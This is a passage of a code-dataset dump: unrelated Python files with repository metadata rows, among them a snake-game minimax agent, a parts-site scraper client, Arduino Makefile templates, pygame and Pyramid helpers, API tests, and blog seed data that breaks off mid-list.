if gameState.is_end:
return [gameState.evaluationFunction(), None]
v = 10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value < v:
v = value
ac = action
if v <= a:
return [v, ac]
b = min(b, v)
return [v, ac]
def get_action(self, index):
return self.maxValue(GameState(self.obs), index-2, 0, -10000, 10000)[1]
def my_controller(observation, action_space, is_act_continuous=False):
ac = Action.mapAct[MinimaxAgent(observation).get_action(observation['controlled_snake_index'])]
return [ac] | 32.186992 | 99 | 0.51023 | 3,747 | 0.946451 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.028543 |
c7a4ae3d4e412782ea4851134b89f174c5ee6fd3 | 224 | py | Python | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
]
| null | null | null | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
]
| null | null | null | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
]
| null | null | null | #!/usr/bin/pyton
# Title:
# Author:
# Additional Authors:
# Filename:
# Description:
# Version:
# Date:
# Last Modified:
# Location_of_the_Video:
# Meta_data_for_YouTube:
# Web_Site_For_Video:
# Start Your Code Here
#EOF
| 12.444444 | 24 | 0.71875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 207 | 0.924107 |
c7a9038c8840f231377e3ea552d065f35efee699 | 289 | py | Python | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
]
| null | null | null | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
]
| 33 | 2021-07-11T22:55:42.000Z | 2022-01-07T23:23:43.000Z | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
]
| null | null | null | def read_csv(root, file_name, keys):
with open('{root}private_static/csv/{file_name}.csv'.format(root=root, file_name=file_name)) as file:
data = file.read()
lines = data.split("\n")
return [dict(zip(keys, line.split(','))) for i, line in enumerate(lines) if i != 0]
| 36.125 | 105 | 0.650519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 49 | 0.16955 |
c7a95d54d497e531abccb6e65c1f8ff7b1fbb2e5 | 7,202 | py | Python | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
]
| null | null | null | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
]
| null | null | null | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
]
| 1 | 2020-11-01T23:54:52.000Z | 2020-11-01T23:54:52.000Z | # coding=utf-8
from parser.client import *
from parser.client.ResponseItem import *
with (Path(__file__).resolve().parent / "config.json").open("rt") as siteConfigFile:
SITE_CONFIG = json.load(siteConfigFile)
class MasterService(Client):
class Link:
main = "https://steering.com.ua/"
login = "https://steering.com.ua/login"
search = "https://steering.com.ua/catalog?oe={}"
name = "masterservice"
def __init__(self):
super().__init__()
self.username = SITE_CONFIG["username"]
self.password = SITE_CONFIG["password"]
start_time = time()
self.connected, self.logged = self.sign_in()
self.login_time = "%.3f s" % (time() - start_time)
def get_info(self, article, brand):
if self.connected and self.logged:
search_request = self.session.get(self.Link.search.format(article))
if search_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
html_tree = html.fromstring(search_request.text)
items = html_tree.xpath('//table[@class="vi-table vi-responsive"]/tr')
if not items:
return self.response_brand(1, "Артикул не знайдено")
for item in items:
brand_expr = './/td[@data-label=""]/a[@rel="nofollow"]/text()'
try:
item_brand = self.clear(item.xpath(brand_expr)[0])
except IndexError:
try:
item_brand = self.clear(item.xpath('.//td[@data-label=""]/text()')[1])
except IndexError:
item_brand = ""
if self.compare(brand, item_brand):
break
else:
return self.response_brand(1, "Бренд не знайдено")
item_link = item.xpath('.//td/div/a/@href')[0]
item_info_request = self.session.get(item_link)
if item_info_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
item_info_tree = html.fromstring(item_info_request.text)
item_info = item_info_tree.xpath('//table[@class="vi-item-table"]//td/text()')
item = ResponseItem(
article=self.clear(item_info[1]),
brand=item_brand,
name="".join(item_info_tree.xpath('//h1[@class="vi-item-name"]/span/text()')[:-1]),
desc=self.clear(item_info[9])
)
try:
item_price = self.clear(item_info_tree.xpath('//span[@class="value"]/span/text()')[0]).replace(" ", "")
except IndexError:
item_price = "0"
item["price"] = "%.2f UAH" % float(item_price)
try:
item_stocks = item_info_tree.xpath('//td[@class="product-nalichie-table"]/table/tr/td/text()')[1:]
except IndexError:
pass
else:
name = None
for number, value in enumerate(item_stocks):
if number % 2:
item["stocks"].append(
{"name": name,
"quantity": self.clear(value),
"term": None}
)
else:
name = self.clear(value)
try:
image_link = self.Link.main[:-1] + item_info_tree.xpath('//div[@class="fotorama"]/img/@src')[0]
except IndexError:
pass
else:
item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
car_using = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//ul[@class="prim-car"]/li')
for car in car_using:
car_name = self.clear(car.xpath('./span/text()')[0])
car_models = car.xpath('./ul/li')
for car_model in car_models:
model_name = self.clear(car_model.xpath('./span/text()')[0])
model_vars = car_model.xpath('./ul/li/text()')
for model_var in model_vars:
try:
item["using"][car_name].append(model_name + " " + self.clear(model_var))
except KeyError:
item["using"][car_name] = [model_name + " " + self.clear(model_var)]
oe = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//div[@class="car-oe"]//dd[@class="content"]')[0]
oe_codes = oe.xpath("./a/text()")
for oe_code in oe_codes:
try:
item["cross"][""].append(self.clear(oe_code))
except KeyError:
item["cross"][""] = [self.clear(oe_code)]
analogs_table = item_info_tree.xpath('//table[@class="products-list vi-table vi-responsive"]')[0]
analogs = analogs_table.xpath('.//tr[@class="even" or @class="odd"]')
for analog in analogs:
analogs_name_list = analog.xpath('.//a[@class="name"]/span/text()')
try:
analog_brand = self.clear(analog.xpath('.//div[@class="vendor"]/span[@class="value"]/text()')[0])
except IndexError:
analog_brand = ""
analog_item = ResponseItem(
article=self.clear(analogs_name_list[-1]),
brand=analog_brand,
name=self.clear("".join(analogs_name_list[:-1]))
)
analog_stocks = analog.xpath('.//td[@class="storage"]//td[not(contains(@class, "title_sklad"))]/text()')
stock_name = ""
for number, stock in enumerate(analog_stocks[1:]):
if number % 2:
analog_item["stocks"].append(
{"name": stock_name,
"quantity": self.clear(stock),
"term": None}
)
else:
stock_name = self.clear(stock).replace(":", "")
image_link = self.Link.main[:-1] + analog.xpath('.//td[@data-label="Фото"]//img/@src')[0]
analog_item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
item.set_analog(analog_item)
return self.response_brand(0, "OK", item)
elif self.connected:
return self.response_brand(3, "Помилка авторизації")
else:
return self.response_brand(2, "Помилка з'єднання")
def sign_in(self):
main_page_request = self.session.get(self.Link.main)
if main_page_request.status_code != 200:
return 0, 0
login_request = self.session.post(self.Link.login, data={"login": self.username, "password": self.password},
headers={"Content-Type": "application/x-www-form-urlencoded"})
if login_request.status_code == 200:
return 1, 1
else:
return 1, 0
| 43.648485 | 120 | 0.509303 | 7,082 | 0.970004 | 0 | 0 | 0 | 0 | 0 | 0 | 1,474 | 0.20189 |
c7a995a9727073409d096c9586ccf8c67b8e8dc3 | 7,320 | py | Python | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
]
| null | null | null | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
]
| 3 | 2015-01-09T20:31:22.000Z | 2015-01-09T20:31:22.000Z | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
]
| null | null | null | # -*- coding: utf-8 -*-
'''
Copyright 2012 Rodrigo Pinheiro Matias <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
templates = {
'static_link': '''
\t@$(AR) rcs %(lib)s %(obj)s
\t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m"''',
'c_obj_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'asm_obj_ruler': '''%(obj)s: %(source)s
\t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'c_asm_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_obj_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_asm_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'avr-main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <avr/sleep.h>
int main(void) {
for(;;)
sleep_mode();
return 0;
}''',
'main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <Arduino.h>
/**
* Setup of the firmware
**/
void setup() {
}
/**
* Schedule events for firmware program
**/
void loop() {
delay(250);
}''',
'Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Defines of Arduino
ARDUINO_HOME=%(sdk_home)s
ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores
ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
ARDUINO=%(sdk_version)s
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\
-fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
OBJ=%(obj_dep)s
CORE_OBJ=%(core_obj_dep)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
CORE_LIB=binary/core.a
LIB_DEPS=%(lib_deps)s
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-C --mcu=$(MCU)
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT)
$(CORE_LIB): $(CORE_OBJ)%(core_ruler)s
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
%(core_asm_rulers)s
%(core_obj_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\trm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
''',
'avr-Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
ASM=%(asm_dep)s
OBJ=%(obj_dep)s
LIB_DEPS=%(lib_deps)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-A
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT)
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\t@rm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
'''
}
| 27.518797 | 138 | 0.630464 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,222 | 0.986612 |
c7a9d270039cb319b1e7bd45460f8d2badbcbfe0 | 1,562 | py | Python | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
]
| 2 | 2016-04-13T02:52:46.000Z | 2017-11-20T22:41:36.000Z | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
]
| null | null | null | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
]
| 3 | 2016-04-14T02:29:32.000Z | 2020-04-27T06:08:07.000Z | import pygame
from pygame.locals import *
import resourceManager
class TextObject(pygame.sprite.Sprite):
def __init__(self,pos,fontSize,fontcolor,textstring):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.position = pos
self.message = textstring
self.color = fontcolor
self.font = pygame.font.Font(None,fontSize)
self.text = self.font.render(self.message, 1,fontcolor)
self.rect = pygame.Rect((0,0),self.font.size(self.message))
self.rect.midtop = pos
def is_clicked(self,events):
if self.is_mouse_over() == True:
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
return True
return False
def is_mouse_over(self):
mousePos = pygame.mouse.get_pos()
if mousePos[0] < self.rect.x:
return False
if mousePos[0] > self.rect.x + self.rect.w:
return False
if mousePos[1] < self.rect.y:
return False
if mousePos[1] > self.rect.y + self.rect.h:
return False
return True
def update_message(self,message):
self.message = message
self.text = self.font.render(message, 1,self.color)
self.rect.w = self.font.size(message)[0]
self.rect.h = self.font.size(message)[1]
self.rect.midtop = self.position
def update(self):
pass
def draw(self,screen):
screen.blit(self.text, self.rect)
| 31.24 | 68 | 0.596031 | 1,495 | 0.957106 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.015365 |
c7aa2635f7e1d5416d843dacc6078257816ee795 | 2,268 | py | Python | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
]
| 4 | 2018-01-04T22:31:08.000Z | 2021-07-15T17:39:16.000Z | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
]
| 7 | 2017-10-31T23:47:47.000Z | 2022-01-10T00:12:42.000Z | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
]
| 10 | 2017-09-14T00:57:07.000Z | 2021-07-27T23:41:14.000Z | from datetime import datetime
from jsonschema_serialize_fork import NO_DEFAULT
from pyramid.security import effective_principals
from pyramid.threadlocal import get_current_request
from string import (
digits,
ascii_uppercase,
)
import random
import uuid
from snovault.schema_utils import server_default
ACCESSION_FACTORY = __name__ + ':accession_factory'
def includeme(config):
from pyramid.path import DottedNameResolver
accession_factory = config.registry.settings.get('accession_factory')
if accession_factory:
factory = DottedNameResolver().resolve(accession_factory)
else:
factory = enc_accession
config.registry[ACCESSION_FACTORY] = factory
@server_default
def userid(instance, subschema):
request = get_current_request()
principals = effective_principals(request)
for principal in principals:
if principal.startswith('userid.'):
return principal[7:]
return NO_DEFAULT
@server_default
def now(instance, subschema):
# from jsonschema_serialize_fork date-time format requires a timezone
return datetime.utcnow().isoformat() + '+00:00'
@server_default
def uuid4(instance, subschema):
return str(uuid.uuid4())
@server_default
def accession(instance, subschema):
if 'external_accession' in instance:
return NO_DEFAULT
request = get_current_request()
factory = request.registry[ACCESSION_FACTORY]
# With 17 576 000 options
ATTEMPTS = 10
for attempt in range(ATTEMPTS):
new_accession = factory(subschema['accessionType'])
if new_accession in request.root:
continue
return new_accession
raise AssertionError("Free accession not found in %d attempts" % ATTEMPTS)
ENC_ACCESSION_FORMAT = (digits, digits, digits, ascii_uppercase, ascii_uppercase, ascii_uppercase)
def enc_accession(accession_type):
random_part = ''.join(random.choice(s) for s in ENC_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
TEST_ACCESSION_FORMAT = (digits, ) * 6
def test_accession(accession_type):
""" Test accessions are generated on test.encodedcc.org
"""
random_part = ''.join(random.choice(s) for s in TEST_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
| 28 | 98 | 0.740741 | 0 | 0 | 0 | 0 | 1,029 | 0.453704 | 0 | 0 | 299 | 0.131834 |
c7aa99e86ce9b9941bb3c2dee52be602130563cd | 200 | py | Python | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
]
| 1 | 2021-10-11T20:20:50.000Z | 2021-10-11T20:20:50.000Z | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
]
| null | null | null | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
]
| 2 | 2021-01-22T10:52:04.000Z | 2021-10-06T10:28:07.000Z | from flask import Flask
#from config import Config
import config
app = Flask(__name__)
#app.config.from_object(Config)
app.config.from_object(config)
#from app import routes
from app import gettoken | 20 | 31 | 0.81 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 80 | 0.4 |
c7ae90de0db880bd9c87e6ef499b2ab425e89a1b | 19 | py | Python | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
]
| null | null | null | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
]
| null | null | null | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
]
| null | null | null | """Todo module."""
| 9.5 | 18 | 0.526316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.947368 |
c7aedff29cfbc578d32b6b83c7dce7618a9b1e46 | 680 | py | Python | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
]
| 1 | 2021-05-11T14:15:11.000Z | 2021-05-11T14:15:11.000Z | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
]
| 14 | 2021-02-23T11:53:08.000Z | 2021-11-16T10:45:31.000Z | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
]
| null | null | null | #!/usr/bin/python3.7
########################################################################################
# pvt_collector/pipe.py - Represents a pipe within the system.
#
# Author: Ben Winchester
# Copyright: Ben Winchester, 2021
########################################################################################
"""
The pipe module for the PV-T model.
This module represents a pipe within the PV-T system.
"""
from dataclasses import dataclass
__all__ = ("Pipe",)
@dataclass
class Pipe:
"""
Represents a pipe within the PVT system.
.. attribute:: temperature
The temperature of the pipe, measured in Kelvin.
"""
temperature: float
| 21.25 | 88 | 0.507353 | 186 | 0.273529 | 0 | 0 | 197 | 0.289706 | 0 | 0 | 567 | 0.833824 |
c7b0b81ceafaed0e74acb2a5f98af6b65a8f276d | 1,850 | py | Python | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
]
| null | null | null | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
]
| null | null | null | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
]
| 1 | 2020-05-03T04:34:32.000Z | 2020-05-03T04:34:32.000Z | import unittest
import os
import json
import requests
import requests_mock
from ioapi import api_url, IOService, AuthorizationError, UnexpectedResponseCodeError
class APIAccountStateTestCase(unittest.TestCase):
def setUp(self):
self.service = IOService()
@requests_mock.mock()
def test_account_state_without_auth(self, mock):
data = self._read_mock_response('account_state_without_auth')
self._setup_response(mock, data, 401)
with self.assertRaises(AuthorizationError):
self.service.get_account_state()
@requests_mock.mock()
def test_account_state_auth_not_ok(self, mock):
data = self._read_mock_response('account_state_not_ok')
for code in range(201, 600):
# skip 401 status code (unauthorized)
if code == 401:
continue
self._setup_response(mock, data, code)
with self.assertRaises(UnexpectedResponseCodeError) as cm:
self.service.get_account_state()
self.assertEqual(cm.exception.status_code, code)
@requests_mock.mock()
def test_account_state(self, mock):
data = self._read_mock_response('account_state')
self.service = IOService()
self._setup_response(mock, data)
self.assertEqual(self.service.get_account_state(), data)
self.fail("auth missing")
def _read_mock_response(self, name):
path = os.path.join(os.path.dirname(__file__), name + '.json')
with open(path, 'r') as file:
data = json.loads(file.read())
return data
def _setup_response(self, mock, response, code=None):
if code is None:
code = requests.codes.ok
mock.get(
self.service.api + api_url.URL_ACCOUNT_STATE,
json=response,
status_code=code)
| 31.355932 | 85 | 0.656216 | 1,686 | 0.911351 | 0 | 0 | 1,094 | 0.591351 | 0 | 0 | 126 | 0.068108 |
c7b0f4e12943a98dbd413a45f48a80cdcaf7bcf6 | 6,517 | py | Python | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
]
| null | null | null | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
]
| null | null | null | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
]
| null | null | null | '''
fake posts to bootstrap a development database. Put any interesting cases
useful for development in here.
'''
from datetime import datetime
POST_DATA_1 = [
{
"created" : datetime(2015, 10, 1),
"published": datetime(2015, 10, 1),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "First Post",
"slug": "",
"text": "a bunch of words #foo #bar",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "published",
"title": "Second Post",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "draft",
"title": "Third Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "draft",
"title": "Fourth Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
]
POST_DATA_2 = [
{
"created" : datetime(2015, 3, 2),
"published": datetime(2015, 3, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 1",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 4, 2),
"published": datetime(2015, 4, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 2",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 3",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 4",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 5",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
